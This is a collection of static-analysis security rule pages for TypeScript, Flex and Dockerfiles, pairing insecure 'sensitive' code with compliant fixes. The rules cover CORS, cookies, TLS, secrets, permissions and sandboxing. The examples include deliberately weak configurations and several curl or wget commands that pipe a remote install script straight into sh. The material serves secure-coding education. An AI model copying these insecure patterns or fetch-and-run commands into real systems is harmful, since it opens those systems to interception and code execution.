The same-origin policy in browsers prevents, by default and for security reasons, a JavaScript frontend from performing a cross-origin HTTP request to a resource that has a different origin (domain, protocol, or port) from its own. The requested target can append additional HTTP headers to the response, called CORS headers, that act as directives for the browser and change the access control policy, i.e. relax the same-origin policy.

Ask Yourself Whether

  • You don’t trust the origin specified, for example: Access-Control-Allow-Origin: untrustedwebsite.com.
  • The access control policy is entirely disabled: Access-Control-Allow-Origin: *
  • Your access control policy is dynamically defined by a user-controlled input like the Origin header.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • The Access-Control-Allow-Origin header should be set only for a trusted origin and for specific resources.
  • Allow only selected, trusted domains in the Access-Control-Allow-Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use * wildcard nor blindly return the Origin header content without any checks).

Sensitive Code Example

nodejs http built-in module:

const http = require('http');
const srv = http.createServer((req, res) => {
  res.writeHead(200, { 'Access-Control-Allow-Origin': '*' }); // Sensitive
  res.end('ok');
});
srv.listen(3000);

Express.js framework with cors middleware:

const cors = require('cors');

let app1 = express();
app1.use(cors()); // Sensitive: by default origin is set to *

let corsOptions = {
  origin: '*' // Sensitive
};

let app2 = express();
app2.use(cors(corsOptions));

User-controlled origin:

function (req, res) {
  const origin = req.header('Origin');
  res.setHeader('Access-Control-Allow-Origin', origin); // Sensitive
};

Compliant Solution

nodejs http built-in module:

const http = require('http');
const srv = http.createServer((req, res) => {
  res.writeHead(200, { 'Access-Control-Allow-Origin': 'trustedwebsite.com' }); // Compliant
  res.end('ok');
});
srv.listen(3000);

Express.js framework with cors middleware:

const cors = require('cors');

let corsOptions = {
  origin: 'trustedwebsite.com' // Compliant
};

let app = express();
app.use(cors(corsOptions));

User-controlled origin validated with an allow-list:

function (req, res) {
  const origin = req.header('Origin');

  if (trustedOrigins.indexOf(origin) >= 0) {
    res.setHeader('Access-Control-Allow-Origin', origin);
  }
};
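The reflect-only-if-allow-listed check above can also be factored into a small helper. The snippet below is a minimal sketch (the list contents and the function name are illustrative, not from the rule):

```javascript
// Illustrative allow-list check: echo the Origin header back only when it
// matches a trusted origin exactly; return null otherwise so the
// Access-Control-Allow-Origin header is omitted entirely.
const trustedOrigins = [
  'https://trustedwebsite.com',
  'https://app.trustedwebsite.com'
];

function corsOriginFor(requestOrigin) {
  return trustedOrigins.includes(requestOrigin) ? requestOrigin : null;
}
```

Exact matching matters here: substring or prefix checks (e.g. `origin.includes('trustedwebsite.com')`) can be bypassed with attacker-registered domains such as `trustedwebsite.com.evil.com`.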

See

typescript:S6332

Amazon Elastic File System (EFS) is a serverless file system that does not require provisioning or managing storage. Stored files can be automatically encrypted by the service. If adversaries gain physical access to the storage medium, or otherwise leak files from it, they cannot access the data.

Ask Yourself Whether

  • The file system contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EFS file systems that contain sensitive information. Encryption and decryption are handled transparently by EFS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws-cdk-lib.aws-efs.FileSystem

import { FileSystem } from 'aws-cdk-lib/aws-efs';
import { Vpc } from 'aws-cdk-lib/aws-ec2';

new FileSystem(this, 'unencrypted-explicit', {
    vpc: new Vpc(this, 'VPC'),
    encrypted: false // Sensitive
});

For aws-cdk-lib.aws-efs.CfnFileSystem

import { CfnFileSystem } from 'aws-cdk-lib/aws-efs';

new CfnFileSystem(this, 'unencrypted-implicit-cfn', {
}); // Sensitive as encryption is disabled by default

Compliant Solution

For aws-cdk-lib.aws-efs.FileSystem

import { FileSystem } from 'aws-cdk-lib/aws-efs';
import { Vpc } from 'aws-cdk-lib/aws-ec2';

new FileSystem(this, 'encrypted-explicit', {
    vpc: new Vpc(this, 'VPC'),
    encrypted: true
});

For aws-cdk-lib.aws-efs.CfnFileSystem

import { CfnFileSystem } from 'aws-cdk-lib/aws-efs';

new CfnFileSystem(this, 'encrypted-explicit-cfn', {
    encrypted: true
});

See

typescript:S2092

When a cookie is protected with the secure attribute set to true, it will not be sent by the browser over an unencrypted HTTP request, and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.

Ask Yourself Whether

  • The cookie is, for instance, a session cookie that is not designed to be sent over non-HTTPS communication.
  • It is unclear whether the website contains mixed content (i.e. whether HTTPS is used everywhere).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • It is recommended to use HTTPS everywhere, so setting the secure flag to true should be the default behaviour when creating cookies.
  • Set the secure flag to true for session-cookies.

Sensitive Code Example

cookie-session module:

let session = cookieSession({
  secure: false, // Sensitive
}); // Sensitive

express-session module:

const express = require('express');
const session = require('express-session');

let app = express();
app.use(session({
  cookie:
  {
    secure: false // Sensitive
  }
}));

cookies module:

let cookies = new Cookies(req, res, { keys: keys });

cookies.set('LastVisit', new Date().toISOString(), {
  secure: false // Sensitive
}); // Sensitive

csurf module:

const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');

let csrfProtection = csrf({ cookie: { secure: false }}); // Sensitive

Compliant Solution

cookie-session module:

let session = cookieSession({
  secure: true, // Compliant
}); // Compliant

express-session module:

const express = require('express');
const session = require('express-session');

let app = express();
app.use(session({
  cookie:
  {
    secure: true // Compliant
  }
}));

cookies module:

let cookies = new Cookies(req, res, { keys: keys });

cookies.set('LastVisit', new Date().toISOString(), {
  secure: true // Compliant
}); // Compliant

csurf module:

const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');

let csrfProtection = csrf({ cookie: { secure: true }}); // Compliant
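When cookies are set manually rather than through one of these modules, the same attribute can be appended to the Set-Cookie value directly. The helper below is a minimal sketch (the function name and attribute choices beyond Secure are illustrative hardening, not mandated by the rule):

```javascript
// Illustrative: build a Set-Cookie value with the Secure attribute so the
// browser only transmits the cookie over HTTPS. HttpOnly and SameSite are
// additional common hardening attributes.
function sessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Secure; HttpOnly; SameSite=Strict; Path=/`;
}
```

A server would then emit it with `res.setHeader('Set-Cookie', sessionCookie('sid', token))`.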

See

flex:S1466

Why is this an issue?

The Security.exactSettings value should remain set at the default value of true. Setting this value to false could make the SWF vulnerable to cross-domain attacks.

Noncompliant code example

Security.exactSettings = false;

Compliant solution

Security.exactSettings = true;
flex:S1465

Why is this an issue?

A LocalConnection object is used to invoke a method in another LocalConnection object, either within a single SWF file or between multiple SWF files. This kind of local connection should be authorized only when the origin (domain) of the other Flex applications is perfectly defined.

Noncompliant code example

localConnection.allowDomain("*");

Compliant solution

localConnection.allowDomain("www.myDomain.com");
flex:S1468

Why is this an issue?

Calling Security.allowDomain("*") lets any domain cross-script into the domain of this SWF and exercise its functionality.

Noncompliant code example

Security.allowDomain("*");

Compliant solution

Security.allowDomain("www.myDomain.com");
flex:S1951

This rule is deprecated; use S4507 instead.

Why is this an issue?

The trace() function outputs debug statements, which can be read by anyone with a debug version of the Flash player. Because sensitive information could easily be exposed in this manner, trace() should never appear in production code.

Noncompliant code example

    var val:Number = doCalculation();
    trace("Calculation result: " + val);  // Noncompliant

Compliant solution

    var val:Number = doCalculation();

Resources

flex:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers or applications distributed to end users.

Sensitive Code Example

if (unexpectedCondition)
{
  Alert.show("Unexpected Condition"); // Sensitive
}

The trace() function outputs debug statements, which can be read by anyone with a debug version of the Flash player:

var val:Number = doCalculation();
trace("Calculation result: " + val);  // Sensitive

See

flex:S1442

This rule is deprecated; use S4507 instead.

Why is this an issue?

Alert.show(...) can be useful for debugging during development, but in production mode this kind of pop-up could expose sensitive information to attackers, and should never be displayed.

Noncompliant code example

if (unexpectedCondition)
{
  Alert.show("Unexpected Condition");
}

Resources

docker:S6437

Why is this an issue?

Sensitive data has been found in the Dockerfile or Docker image. The data should be considered breached.

If malicious third parties can get a hold of such information, they could impersonate legitimate identities within the organization.
It is a clear breach of trust in the system, as the systems involved falsely assume that the authenticated entity is who it claims to be.
The consequences can be catastrophic.

In Dockerfiles, hard-coded secrets, secrets passed in as build variables, and secrets created at build time are all security risks. The secret information can be exposed via the container environment itself, the image metadata, or the build environment logs.

Docker BuildKit’s secret mount options should be used when secrets have to be accessed at build time. For run-time secrets, best practice is to set them only at runtime, for example with the --env option of the docker run command.

Note that files exposing the secrets should be securely stored and not exposed to a large sphere. If possible, use a secret vault or another similar component. For example, Docker Swarm provides a secrets service that can be used to handle most confidential data.

Noncompliant code example

FROM example
ARG PASSWORD
# Noncompliant
RUN wget --user=guest --password="$PASSWORD" https://example.com

Compliant solution

For build-time secrets, use Buildkit’s secret mount type instead:

FROM example
RUN --mount=type=secret,id=build_secret \
    wget --user=guest --password=$(cat /run/secrets/build_secret) https://example.com

For runtime secrets, leave the environment variables empty until runtime:

FROM example
ENV ACCESS_TOKEN=""
CMD /run.sh

Store the runtime secrets in an environment file (such as .env) and then start the container with the --env-file argument:

docker run --env-file .env myImage

Resources

docker:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it in a given timeframe, attackers can recover the plaintext that the encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in cURL

Code examples

Noncompliant code example

FROM ubuntu:22.04

# Noncompliant
RUN curl --tlsv1.0 -O https://tlsv1-0.example.com/downloads/install.sh

Compliant solution

FROM ubuntu:22.04

RUN curl --tlsv1.2 -O https://tlsv1-3.example.com/downloads/install.sh

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS v1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older cipher suites that are now deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

docker:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it

Code examples

The following code contains examples of disabled certificate validation.

Noncompliant code example

FROM ubuntu:22.04

# Noncompliant
RUN curl --insecure -O https://expired.example.com/downloads/install.sh

Compliant solution

FROM ubuntu:22.04

RUN curl -O https://new.example.com/downloads/install.sh

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Resources

Standards

docker:S6469

Why is this an issue?

Docker offers a feature to mount files and directories for specific RUN instructions when building Docker images. This feature can be used to provide secrets to the commands that are executed during the build without baking them into the image. Additionally, it can be used to access SSH agents during the build.

By using the mode option the permissions of the secrets or agents can be modified. By default, access is limited to the root user.

When such secrets are exposed with lax permissions, they might get compromised during the image build process. A successful compromise can only happen during the execution of the command the mount option has been added to. While this might seem like a very hard exploitation requirement, supply chain attacks, and other related threats, should still be considered.

If you are executing a command as a low-privileged user and need to access secrets or agents, you can use the options uid and gid to provide access without having to resort to world-readable or writable permissions that might expose them to unintended parties.

Noncompliant code example

RUN --mount=type=secret,id=build_secret,mode=0777 ./installer.sh # Noncompliant

Compliant solution

RUN --mount=type=secret,id=build_secret,uid=1000 ./installer.sh

Resources

docker:S6502

Disabling builder sandboxes can lead to unauthorized access of the host system by malicious programs.

By default, programs executed by a RUN statement use only a subset of capabilities which are considered safe: this is called sandbox mode.

If you disable the sandbox with the --security=insecure option, the executed command can use the full set of Linux capabilities.
This can lead to a container escape. For example, an attacker with the SYS_ADMIN capability is able to mount devices from the host system.

This vulnerability allows an attacker who controls the behavior of the executed command to access the host system, break out of the container, and penetrate the infrastructure.

After a successful intrusion, the underlying systems are exposed to:

  • theft of intellectual property and/or personal data
  • extortion
  • denial of service

Ask Yourself Whether

  • The program is controlled by an external entity.
  • The program is part of a supply chain that could be a victim of a supply chain attack.

There is a risk if you answered yes to either of these questions.

Recommended Secure Coding Practices

  • Whenever possible, the sandbox should stay enabled to reduce unnecessary risk.
  • If elevated capabilities are absolutely necessary, make sure to verify the integrity of the program before executing it.

Sensitive Code Example

# syntax=docker/dockerfile:1-labs
FROM ubuntu:22.04
# Sensitive
RUN --security=insecure ./example.sh

Compliant Solution

# syntax=docker/dockerfile:1-labs
FROM ubuntu:22.04
RUN ./example.sh
RUN --security=sandbox ./example.sh

See

docker:S6505

When installing dependencies, package managers like npm will automatically execute shell scripts distributed along with the source code. Post-install scripts, for example, are a common way to execute malicious code at install time whenever a package is compromised.

Ask Yourself Whether

  • The execution of dependency installation scripts is required for the application to function correctly.

There is a risk if you answered no to the question.

Recommended Secure Coding Practices

Execution of third-party scripts should be disabled if not strictly necessary for dependencies to work correctly. Doing this will reduce the attack surface and block a well-known supply chain attack vector.

Sensitive Code Example

FROM node:latest

# Sensitive
RUN npm install

FROM node:latest

# Sensitive
RUN yarn install

Compliant Solution

FROM node:latest

RUN npm install --ignore-scripts

FROM node:latest

RUN yarn install --ignore-scripts

See

docker:S6504

Ownership of an executable has been assigned to a user other than root. More often than not, resource owners have write permissions and thus can edit the resource.

Write permissions enable malicious actors who have gained a foothold in the container to tamper with the executable and thus manipulate the container’s expected behavior.
Manipulating executables could disrupt services or aid in escalating privileges inside the container.

This breaches the container immutability principle as it facilitates container changes during its life. Immutability, a container best practice, allows for a more reliable and reproducible behavior of Docker containers.

Resource ownership is not required; executables can be assigned execute permissions using chmod if needed.

Ask Yourself Whether

  • A non-root user has write permissions for the executable.

There is a risk if you answered yes to the question.

Recommended Secure Coding Practices

  • Use --chmod to change executable permissions at build-time.
  • Be mindful of the container immutability principle.

Sensitive Code Example

FROM example

RUN useradd exampleuser
# Sensitive
COPY --chown=exampleuser:exampleuser src.py dst.py

Compliant Solution

FROM example

COPY src.py dst.py

See

docker:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. This means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure, as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that use of the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against tampering or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.
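The same substitution applies in application code that builds request URLs. A minimal JavaScript sketch (the helper name is illustrative; it covers only the http-to-https case):

```javascript
// Illustrative: upgrade a clear-text http:// URL to its TLS counterpart
// before any request is made. Uses the WHATWG URL API built into Node.js.
function enforceTls(url) {
  const u = new URL(url);
  if (u.protocol === 'http:') {
    u.protocol = 'https:'; // switch to the encrypted scheme
  }
  return u.toString();
}
```

In practice this should be paired with certificate validation left enabled on the client, so the upgraded connection is actually authenticated.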

Sensitive Code Example

RUN curl http://www.example.com/

Compliant Solution

RUN curl https://www.example.com/

See

docker:S6500

Installing recommended packages automatically can lead to vulnerabilities in the Docker image.

Potentially unnecessary packages are installed via a known Debian package manager. These packages will increase the attack surface of the created container as they might contain unidentified vulnerabilities or malicious code. Those packages could be used as part of a broader supply chain attack. In general, the more packages are installed in a container, the weaker its security posture is.
Depending on the introduced vulnerabilities, a malicious actor accessing such a container could use these for privilege escalation.
Removing unused packages can also significantly reduce your Docker image size.

To be secure, remove unused packages where possible and ensure images are subject to routine vulnerability scans.

Ask Yourself Whether

  • Container vulnerability scans are not performed.

There is a risk if you answered yes to the question.

Recommended Secure Coding Practices

  • Avoid installing package dependencies that are not strictly required.

Sensitive Code Example

FROM debian:latest

# Sensitive
RUN apt install -y build-essential

# Sensitive
RUN apt-get install -y build-essential

# Sensitive
RUN aptitude install -y build-essential

Compliant Solution

FROM debian:latest

RUN apt install -y --no-install-recommends build-essential

RUN apt-get install -y --no-install-recommends build-essential

RUN aptitude install -y --without-recommends build-essential

See

docker:S6506

The usage of HTTPS is not enforced here. As it is possible for the HTTP client to follow redirects, such redirects might lead to websites using HTTP.

As HTTP is a clear-text protocol, it is considered insecure. Due to its lack of encryption, attackers that are able to sniff traffic from the network can read, modify, or corrupt the transported content. Therefore, allowing redirects to HTTP can lead to several risks:

  • Exposure of sensitive data
  • Malware-infected software updates or installers
  • Corruption of critical information

Even in isolated networks, such as segmented cloud or offline environments, it is important to ensure the usage of HTTPS. If not, then insider threats with access to these environments might still be able to monitor or tamper with communications.

Ask Yourself Whether

  • It is possible for the requested resource to be redirected to an insecure location in the future.

There is a risk if you answered yes to the question.

Recommended Secure Coding Practices

  • Ensure that the HTTP client only accepts HTTPS pages. In curl this can be enabled using the option --proto "=https".
  • If it is not necessary to follow HTTP redirects, disable this in the HTTP client. In curl this is done by omitting the -L or --location option. In wget this is done by adding the option --max-redirect=0.

Sensitive Code Example

In the examples below, an install script is downloaded using curl or wget and then executed.

While connections made using HTTPS are generally considered secure, https://might-redirect.example.com/install.sh might redirect to a location that uses HTTP. Downloads made using HTTP are not secure and can be intercepted and modified. An attacker could modify the install script to run malicious code inside the container.

curl will not follow redirects unless either -L or --location option is used.

FROM ubuntu:22.04

# Sensitive
RUN curl --tlsv1.2 -sSf -L https://might-redirect.example.com/install.sh | sh

wget will follow redirects by default.

FROM ubuntu:22.04

# Sensitive
RUN wget --secure-protocol=TLSv1_2 -q -O - https://might-redirect.example.com/install.sh | sh

Compliant Solution

If you expect the server to redirect the download to a new location, curl can use the option --proto "=https" to ensure requests are only made using HTTPS. Any attempt to redirect to a location using HTTP will result in an error.

FROM ubuntu:22.04

RUN curl --proto "=https" --tlsv1.2 -sSf -L https://might-redirect.example.com/install.sh | sh

wget does not support this functionality so curl should be used instead.

If you expect the server to return the file without redirects, curl should not be instructed to follow redirects. Remove any -L or --location options from the command.

FROM ubuntu:22.04

RUN curl --tlsv1.2 -sSf https://might-redirect.example.com/install.sh | sh

wget uses the option --max-redirect=0 to disable redirects.

FROM ubuntu:22.04

RUN wget --secure-protocol=TLSv1_2 --max-redirect=0 -q -O - https://might-redirect.example.com/install.sh | sh

See

docker:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The container is designed to be a multi-user environment.
  • Services are run by dedicated low-privileged users to achieve privileges separation.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

To be secure, remove the unnecessary permissions. If required, use --chown to set the target user and group.

Sensitive Code Example

# Sensitive
ADD --chmod=777 src dst
# Sensitive
COPY --chmod=777 src dst
# Sensitive
RUN chmod +x resource
# Sensitive
RUN chmod u+s resource

Compliant Solution

ADD --chmod=754 src dst
COPY --chown=user:user --chmod=744 src dst
RUN chmod u+x resource
RUN chmod +t resource

See

docker:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers or applications distributed to end users.

Sensitive Code Example

FROM example
# Sensitive
ENV APP_DEBUG=true
# Sensitive
ENV ENV=development
CMD /run.sh

Compliant Solution

FROM example
ENV APP_DEBUG=false
ENV ENV=production
CMD /run.sh

See

docker:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset a password, etc.).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512 or SHA-3, are recommended. For password hashing, it is even better to use algorithms that are deliberately slow to compute, like bcrypt, scrypt, argon2 or pbkdf2, because slow hashing hinders brute-force attacks.
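
The alternatives above can be sketched with Python's standard library (an illustration only; the sample data and salt are made up). bcrypt, scrypt and argon2 live in third-party packages, but hashlib ships SHA-256 and PBKDF2:

```python
import hashlib

data = b"go1.20.linux-amd64.tar.gz"  # stand-in for a downloaded artifact

# Collision-prone; do not use for new integrity checks or passwords:
weak = hashlib.sha1(data).hexdigest()

# Preferred for integrity verification: SHA-256 (or SHA-512, SHA-3):
strong = hashlib.sha256(data).hexdigest()

# For password storage, prefer a deliberately slow key-derivation function;
# the standard library provides PBKDF2 with a configurable iteration count:
dk = hashlib.pbkdf2_hmac("sha256", b"password", b"per-user-salt", 600_000)
```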

Sensitive Code Example

FROM ubuntu:22.04

# Sensitive
RUN echo "a40216e7c028e7d77f1aec22d2bbd5f9a357016f  go1.20.linux-amd64.tar.gz" | sha1sum -c
RUN tar -C /usr/local -xzf go1.20.linux-amd64.tar.gz
ENV PATH="$PATH:/usr/local/go/bin"

Compliant Solution

FROM ubuntu:22.04

RUN echo "5a9ebcc65c1cce56e0d2dc616aff4c4cedcfbda8cc6f0288cc08cda3b18dcbf1  go1.20.linux-amd64.tar.gz" | sha256sum -c
RUN tar -C /usr/local -xzf go1.20.linux-amd64.tar.gz
ENV PATH="$PATH:/usr/local/go/bin"

See

docker:S6473

Exposing administration services can lead to unauthorized access of containers or escalation of privileges inside of containers.

A port that is commonly used for administration services is marked as being open through the EXPOSE command. Administration services like SSH might contain vulnerabilities, hard-coded credentials, or other security issues that increase the attack surface of a Docker deployment.
Even if the ports of the services do not get forwarded to the host system, by default they are reachable from other containers in the same network. A malicious actor that gets access to one container could use such services to escalate access and privileges.

Removing the EXPOSE command is not sufficient to be secure. The port is still open and the service accessible. To be secure, no administration services should be started. Instead, try to access the required information from the host system. For example, if the administration service is included to access logs or debug a service, you can do this from the host system instead. Docker allows you to read any file inside a container and to spawn a shell in a container if necessary.

Ask Yourself Whether

  • The container starts an administration service.

There is a risk if you answered yes to the question.

Recommended Secure Coding Practices

  • Do not start SSH, VNC, RDP or similar administration services in containers.

Sensitive Code Example

FROM ubuntu:22.04
# Sensitive
EXPOSE 22
CMD ["/usr/sbin/sshd", "-f", "/etc/ssh/sshd_config", "-D"]

See

docker:S6472

Using ENV and ARG to handle secrets can lead to sensitive information being disclosed to an inappropriate sphere.

The ARG and ENV instructions in a Dockerfile are used to configure the image build and the container environment respectively. Both can be used at image build time, during the execution of commands in the container, and ENV can also be used at runtime.

In most cases, build-time and environment variables are used to propagate configuration items from the host to the image or container. A typical example of an environment variable is PATH, which configures where system executables are searched for.

Using ARG and ENV to propagate configuration entries that contain secrets is a security risk: in most cases, artifacts of those values are kept in the final image. The secret can leak through the container environment itself, the image metadata, or the build environment logs.

The concrete impact of such an issue highly depends on the secret’s purpose and the exposure sphere:

  • Financial impact if a paid service API key is disclosed and used.
  • Application compromise if an application’s secret, like a session signing key, is disclosed.
  • Infrastructure component takeover, if a system secret, like a remote access key, is leaked.

Ask Yourself Whether

  • The variable contains a value that should be kept confidential.
  • The container image or Dockerfile will be distributed to users who do not need to know the secret value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use Buildkit’s secret mount options when secrets have to be used at build time.
  • For runtime secret variables, best practice is to set them only at runtime, for example with the --env option of the docker run command.

Note that, in both cases, the files exposing the secrets should be securely stored and not exposed to a large sphere. In most cases, using a secret vault or another similar component should be preferred. For example, Docker Swarm provides a secrets service that can be used to handle most confidential data.

Sensitive Code Example

FROM example
# Sensitive
ARG ACCESS_TOKEN
# Sensitive
ENV ACCESS_TOKEN=${ACCESS_TOKEN}
CMD /run.sh

Compliant Solution

For build time secrets, use Buildkit’s secret mount type instead:

FROM example
RUN --mount=type=secret,id=build_secret ./installer.sh

For runtime secrets, leave the environment variables empty until runtime:

FROM example
ENV ACCESS_TOKEN=""
CMD /run.sh

Store the runtime secrets in an environment file (such as .env) and then start the container with the --env-file argument:

docker run --env-file .env myImage

See

docker:S6497

A container image digest uniquely and immutably identifies a container image. A tag, on the other hand, is a mutable reference to a container image.

This tag can be updated to point to another version of the container at any point in time.
In general, image digests are used instead of tags to keep a system or infrastructure deterministic, for reliability reasons.

The problem is that pulling such an image prevents the resulting container from being updated or patched in order to remove vulnerabilities or significant bugs.

Ask Yourself Whether

  • You expect to receive security updates of the base image.

There is a risk if you answer yes to this question.

Recommended Secure Coding Practices

Containers should get the latest security updates. If there is a need for determinism, the solution is to find tags that are not as prone to change as latest or shared tags.

To do so, favor a more precise tag that uses semantic versioning and target a major version, for example.

Sensitive Code Example

FROM mongo@sha256:8eb8f46e22f5ccf1feb7f0831d02032b187781b178cb971cd1222556a6cee9d1

RUN echo ls

Compliant Solution

Here, mongo:6.0 is better than using a digest, and better than a more precise version such as 6.0.4, because pinning to 6.0.4 would prevent the 6.0.5 security update from being applied:

FROM mongo:6.0

RUN echo ls

See

docker:S6431

Using host operating system namespaces can lead to compromise of the host system.
Opening network services of the local host system to the container creates a new attack surface for attackers.

Host network sharing could provide a significant performance advantage for workloads that require critical network performance. However, the successful exploitation of this attack vector could have a catastrophic impact on confidentiality within the host.

Ask Yourself Whether

  • The host exposes sensitive network services.
  • The performance of the container's services does not rely on operating system namespaces.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not use host operating system namespaces.

